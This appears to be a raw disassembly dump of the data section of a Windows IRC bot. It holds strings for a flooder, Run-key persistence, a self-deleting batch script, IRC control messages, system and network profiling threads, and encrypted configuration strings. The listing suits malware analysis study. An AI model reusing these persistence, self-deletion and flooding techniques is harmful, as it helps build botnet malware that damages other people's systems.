dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h ; DATA XREF: sub_403FE5:loc_403FFD�o
dword_418A1C dd 0BF988BA8h, 0CCFDEEB5h, 0AB86A2B0h, 0B9h, 0 ; DATA XREF: sub_4043E9+6�o
dword_418A30 dd 2E3031h ; DATA XREF: sub_4041B7+56�o
dword_418A34 dd 2E323931h, 2E383631h, 0 ; DATA XREF: sub_4041B7+3B�o
dword_418A40 dd 2E323731h, 0 ; DATA XREF: sub_4041B7+20�o
dword_418A48 dd 2E373231h, 0 ; DATA XREF: sub_4041B7+5�o
dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; DATA XREF: sub_40D871+1CC�o
; sub_41113B+45A�o
dword_418A5C dd 313A3Ah ; DATA XREF: sub_40435B+42�o
dword_418A60 dd 7525h ; DATA XREF: sub_4055E5+458�o
; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; DATA XREF: sub_4055E5+31E�o
; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; .data:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365h ; DATA XREF: sub_4064BF+31�o
dword_418B54 dd 58323025h, 0 ; DATA XREF: sub_406722+266�o
; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; DATA XREF: sub_406722+201�o
; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; DATA XREF: sub_406722+1E3�o
; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset dword_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset dword_418D98
dd offset dword_418DA8
dd offset loc_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset loc_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset dword_418C9C
dd offset dword_418C88
dd offset dword_418C6C
dd offset dword_418C5C
dd offset dword_418C6C
dd offset loc_418C4C
dd offset dword_418C24
dd offset dword_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 0E38C9592h, 0C4FDFFECh, 0A0A1ACA1h, 0EEB2FCB9h, 0D4CF88BAh
; DATA XREF: .data:00418BE4�o
dd 0CDFEFCFBh, 9AE9A7h, 0
dword_418C10 dd 0E19799B6h, 0C7E0E3EFh, 0AB90E9FBh, 2 dup(0) ; DATA XREF: .data:00418BE0�o
dword_418C24 dd 0FD9F8C9Eh, 0D6F3EFEAh, 0EE86E3BCh, 0E5B9F881h, 0F0A8DCADh
; DATA XREF: .data:00418BDC�o
dd 0C3E5E9F7h, 0ABBBACACh, 0E3A9EFBFh, 0BAh, 0
; ---------------------------------------------------------------------------
loc_418C4C: ; DATA XREF: .data:00418BD8�o
mov esi, 0ADE28890h
jmp loc_425440
; ---------------------------------------------------------------------------
align 4
dd 0
dword_418C5C dd 0FE808CACh, 8CE4FFCAh, 8DF4B0h, 0 ; DATA XREF: .data:00418BD0�o
dword_418C6C dd 0FE808C8Ch, 82E0E9EFh, 9D8AF986h, 0E5B4EAB4h, 0E1AEDCB2h
; DATA XREF: .data:00418BCC�o
; .data:00418BD4�o
dd 0F3h, 0
dword_418C88 dd 0FE808CACh, 0C1E4FFEFh, 0AB90E9FBh, 2 dup(0) ; DATA XREF: .data:00418BC8�o
dword_418C9C dd 0F5819588h, 82E1FBECh, 0B99CE99Bh, 0A0ABEBA2h, 0F49D9599h
; DATA XREF: .data:00418BC4�o
dd 0CEFEEDF4h, 2 dup(0)
dword_418CBC dd 0F49D95B9h, 0CEFEEDF4h, 0AB90E9FBh, 2 dup(0) ; DATA XREF: .data:00418BC0�o
dword_418CD0 dd 0F0819588h, 0E3B2FCEEh, 0BA86E9B2h, 2 dup(0) ; DATA XREF: .data:00418BBC�o
dword_418CE4 dd 0F08195A8h, 0C7BCFCEEh, 0E9ADh, 0 ; DATA XREF: .data:00418BB8�o
dword_418CF4 dd 0F5819588h, 82E1FBECh, 0A298F490h, 0F2A5EBA2h, 2 dup(0)
; DATA XREF: .data:00418BB4�o
dword_418D0C dd 0FD9F84BAh, 0D0F7FEECh, 0AB90E9FBh, 2 dup(0) ; DATA XREF: .data:00418BB0�o
; ---------------------------------------------------------------------------
loc_418D20: ; DATA XREF: .data:00418BA8�o
test al, 95h
sbb eax, 0CCFDEBECh
sti
jmp loc_4238BE
; ---------------------------------------------------------------------------
align 10h
dd 0
dword_418D34 dd 0F5819588h, 82E1FBECh, 0A18FE399h, 0F081B9A3h, 0F28690AFh
; DATA XREF: .data:00418BA4�o
; .data:00418BAC�o
dd 0CDFBF8E2h, 0BBh, 0
dword_418D54 dd 0FE8893B3h, 0DAF7A2EDh, 0B0h, 0 ; DATA XREF: .data:00418BA0�o
dword_418D64 dd 0F486909Ch, 0F1B2F8EDh, 0AB9EFEB0h, 0F592B9BFh, 0FC8688B1h
; DATA XREF: .data:00418B9C�o
dd 0D0C2ACE6h, 0BD8DEFBAh, 0BEh, 0
; ---------------------------------------------------------------------------
loc_418D88: ; DATA XREF: .data:00418B98�o
mov esp, 0ADE29D8Fh
jmp loc_42557C
; ---------------------------------------------------------------------------
align 8
dword_418D98 dd 0E28E8F96h, 0DAF7A2F0h, 0B0h, 0 ; DATA XREF: .data:00418B90�o
dword_418DA8 dd 0F08C9393h, 0C7C1ACEFh, 0A79AF9B6h, 0C1E0E0B9h, 0FE8788AAh
; DATA XREF: .data:off_418B8C�o
; .data:00418B94�o
dd 0DBE6E5F1h, 0BC8DDFF5h, 0E5A3F0BBh, 2 dup(0)
dword_418DD0 dd 0F09C8FB3h, 0DAF7A2F0h, 0B0h, 0 ; DATA XREF: .data:off_418B88�o
dword_418DE0 dd 293Ah ; DATA XREF: sub_406A23+9C�o
dword_418DE4 dd 5Ch ; DATA XREF: sub_406A23+1B�o
; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65h ; DATA XREF: sub_406B81+1B�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64h ; DATA XREF: sub_40732D:loc_407423�o
dword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; DATA XREF: sub_407928+4C�o
; sub_407928+96�o ...
dword_418F50 dd 30h ; DATA XREF: sub_407E0C+CB�o
; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; DATA XREF: sub_407F3D+118�o
; sub_40806A+BD�o
dword_418F60 dd 0BF818FB2h, 0FFE3E0h, 0 ; DATA XREF: sub_408887+6�o
dword_418F6C dd 0BF988BA8h, 0D0E0E9F7h, 0A18BA2B4h, 0F2A2B7A0h, 2 dup(0)
; DATA XREF: sub_408887+14�o
dword_418F84 dd 0BF818FB2h, 0E9E7h, 0 ; DATA XREF: sub_408887+22�o
dword_418F90 dd 0FC9A9DBBh, 0D6F7E2ADh, 2 dup(0) ; DATA XREF: sub_408887+30�o
dword_418FA0 dd 0F68093B8h, 0C3BCE9EFh, 0B0h, 0 ; DATA XREF: sub_408887+3E�o
dword_418FB0 dd 0F48195B1h, 8CFCFFEEh, 0E085E3B6h, 0ECACh, 0 ; DATA XREF: sub_408887+4C�o
off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset dword_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 0FF9893BBh, 0C6F3E3EFh, 0A389EBFBh, 0F9EEEAA8h, 0FE8094BEh
; DATA XREF: .data:00418FD8�o
dd 0CFFDEFADh, 0A389EBFAh, 0E4EFEAA8h, 0FD818BB0h, 8DF6EDECh
dd 0A08FE5A6h, 0F0EFFDA8h, 0F08C8CB0h, 0C3EBA3F3h, 9187E3BDh
dd 0E5AAFCAFh, 0F48399A8h, 0D6CDBEE7h, 0FFC5BDB8h, 0E5B8FCE3h
dd 2 dup(0)
dword_41903C dd 0F6C18FAAh, 0D1F7E1E2h, 0A791A2E4h, 0E3EEFEA0h, 91B0h
; DATA XREF: .data:00418FD4�o
dd 0
dword_419054 dd 0FF9893BBh, 0C6F3E3EFh, 0FFC7BFFAh, 0B3EFFFE2h, 0A0DB9AEEh
; DATA XREF: .data:00418FD0�o
dd 8FA5BEB7h, 0ABDCBCEDh, 0E6F8ADE0h, 0F2D7D1E6h, 97BFB4B2h
dd 0F78CBDB4h, 0B8F5FBFEh, 0BE8ACFEAh, 0D1F3FFEEh, 0E08BE2ACh
dd 0A5E1A8h, 0
dword_419098 dd 0FF9893BBh, 0C6F3E3EFh, 0AD81E1FBh, 0EFB3F6BFh, 0F2C188B9h
; DATA XREF: .data:00418FCC�o
dd 0E1ECh, 0
dword_4190B4 dd 0F09B9DBBh, 8DFCE9ACh, 0E18FE5B7h, 0F2B2ECAEh, 0BE9B92BAh
; DATA XREF: .data:off_418FC8�o
dd 0C5FDE3C4h, 0A1BCE9B9h, 0E1A2F5A2h, 0E281B5ADh, 0CEFEEDF7h
dd 0ABC6FEB0h, 0FCB5h, 0
dword_4190E8 dd 0FD8093ABh, 8CE0EDE1h, 0A987E3B2h, 0E3EEFCA1h, 91B0h
; DATA XREF: .data:off_418FC4�o
dd 0
off_419100 dd offset loc_415353+2 ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; DATA XREF: sub_4083AD:loc_4086C8�o
; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; DATA XREF: sub_408E8E+6�r
; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0 ; DATA XREF: sub_408F2E+1ED�o
dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; DATA XREF: sub_408F2E+17C�o
; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_4093B6+67�o
aBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0 ; DATA XREF: sub_409AD5+DA�o
dword_4194CC dd 3430032Dh, 2037802h ; DATA XREF: sub_409AD5:loc_409B25�o
aNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h ; DATA XREF: sub_40A2D2+159�o
dword_419660 dd 0A0D7325h, 0 ; DATA XREF: sub_40A2D2+6E�o
dword_419668 dd 3334h ; DATA XREF: sub_40A2D2+41�o
dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 0F88094A8h, 0D0F3A2F0h, 0A0C6E2BCh, 0EDA8h, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 12EA0h ; DATA XREF: sub_40A9CF+1ECD�r
align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 4DC8A28h ; DATA XREF: sub_40A9CF+1C87�r
dd 2 dup(0)
dword_419788 dd 4D38h ; DATA XREF: sub_40A9CF+1C72�r
align 10h
dword_419790 dd 22710E8h ; DATA XREF: sub_40A9CF+1C4B�r
dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 99C3EAA0h ; DATA XREF: sub_40A9CF+1BE9�r
dd 3 dup(0)
dword_4197B4 dd 261D51F8h ; DATA XREF: sub_40A9CF+1BC2�r
align 10h
dword_4197C0 dd 260A0h ; DATA XREF: sub_40A9CF+1BAD�r
align 8
dword_4197C8 dd 1371D1F8h ; DATA XREF: sub_40A9CF+1B86�r
dd 2 dup(0)
dword_4197D4 dd 135E8h ; DATA XREF: sub_40A9CF+1B71�r
dd 0
dword_4197DC dd 0E7606A0h ; DATA XREF: sub_40A9CF+1B36�r
dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 18820E30h ; DATA XREF: sub_40A9CF+1AFC�r
dd 2 dup(0)
dword_419818 dd 18788h ; DATA XREF: sub_40A9CF+1AE7�r
align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 4CBE20h ; DATA XREF: sub_40A9CF+19B1�r
dd 2 dup(0)
dword_419844 dd 2343003h, 2037325h ; DATA XREF: sub_40A9CF+1992�o
aHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 0E7AAB82Ch ; DATA XREF: sub_40A9CF+180B�r
dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 158F28h ; DATA XREF: sub_40A9CF+1710�r
align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; DATA XREF: sub_40A9CF:loc_40BFBA�o
; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 0FF28h ; DATA XREF: sub_40A9CF+1534�r
dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 5B7606ABh ; DATA XREF: sub_40A9CF+14F5�r
dd 3 dup(0)
dword_41999C dd 26C9788h ; DATA XREF: sub_40A9CF+14E0�r
dd 2 dup(0)
dword_4199A8 dd 48B0h ; DATA XREF: sub_40A9CF+14B2�r
align 10h
dword_4199B0 dd 4CEEE8h ; DATA XREF: sub_40A9CF+1484�r
dd 2 dup(0)
dword_4199BC dd 0ECE0h ; DATA XREF: sub_40A9CF+146F�r
dd 0
dword_4199C4 dd 0DC9BA4F1h ; DATA XREF: sub_40A9CF+1450�r
dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 8A248h ; DATA XREF: sub_40A9CF+1400�r
align 10h
dword_419A10 dd 2D77B5A0h ; DATA XREF: sub_40A9CF+1399�r
dd 2 dup(0)
dword_419A1C dd 10468h ; DATA XREF: sub_40A9CF+1374�r
dd 0
dword_419A24 dd 12BBA0h ; DATA XREF: sub_40A9CF+135F�r
align 10h
dword_419A30 dd 1471A0h ; DATA XREF: sub_40A9CF+134A�r
dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520h ; DATA XREF: sub_40A9CF+1333�o
dword_419A44 dd 8BD28h ; DATA XREF: sub_40A9CF+1310�r
align 10h
dword_419A50 dd 1277AE62h ; DATA XREF: sub_40A9CF+12E9�r
align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
off_419A7C dd offset loc_410DB7+1 ; DATA XREF: sub_40A9CF+125F�r
dd 2 dup(0)
dword_419A88 dd 2DCF8h ; DATA XREF: sub_40A9CF+122B�r
align 10h
dword_419A90 dd 4688368h ; DATA XREF: sub_40A9CF+11E7�r
dd 2 dup(0)
dword_419A9C dd 123B8h ; DATA XREF: sub_40A9CF+11A3�r
dd 0
dword_419AA4 dd 4C2338h ; DATA XREF: sub_40A9CF+114C�r
align 10h
dword_419AB0 dd 54524150h, 732520h ; DATA XREF: sub_40A9CF+1135�o
dword_419AB8 dd 1265A0h ; DATA XREF: sub_40A9CF+1112�r
dd 2 dup(0)
dword_419AC4 dd 0C0AB0h ; DATA XREF: sub_40A9CF+10B0�r
align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40A9CF+1098�o
; sub_40A9CF+10FA�o ...
dword_419ADC dd 0A6CB0h ; DATA XREF: sub_40A9CF+102C�r
dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 5AF4DA8h ; DATA XREF: sub_40A9CF+FF6�r
dd 2 dup(0)
dword_419B08 dd 8085E8h ; DATA XREF: sub_40A9CF+FC1�r
dd 2 dup(0)
dword_419B14 dd 4CD168h ; DATA XREF: sub_40A9CF+F80�r
align 10h
dword_419B20 dd 0CEF58D2Ch ; DATA XREF: sub_40A9CF+F52�r
align 10h
dword_419B30 dd 2DB260E0h ; DATA XREF: sub_40A9CF+F24�r
dd 2 dup(0)
dword_419B3C dd 90BBA32Ch ; DATA XREF: sub_40A9CF+EFE�r
dd 3 dup(0)
dword_419B4C dd 48489E0h ; DATA XREF: sub_40A9CF+ED0�r
dd 2 dup(0)
dword_419B58 dd 1246E8h ; DATA XREF: sub_40A9CF+EAA�r
dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 0DFBD949h ; DATA XREF: sub_40A9CF+E5A�r
dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
off_419BA4 dd offset loc_40E3E0 ; DATA XREF: sub_40A9CF+DC8�r
align 10h
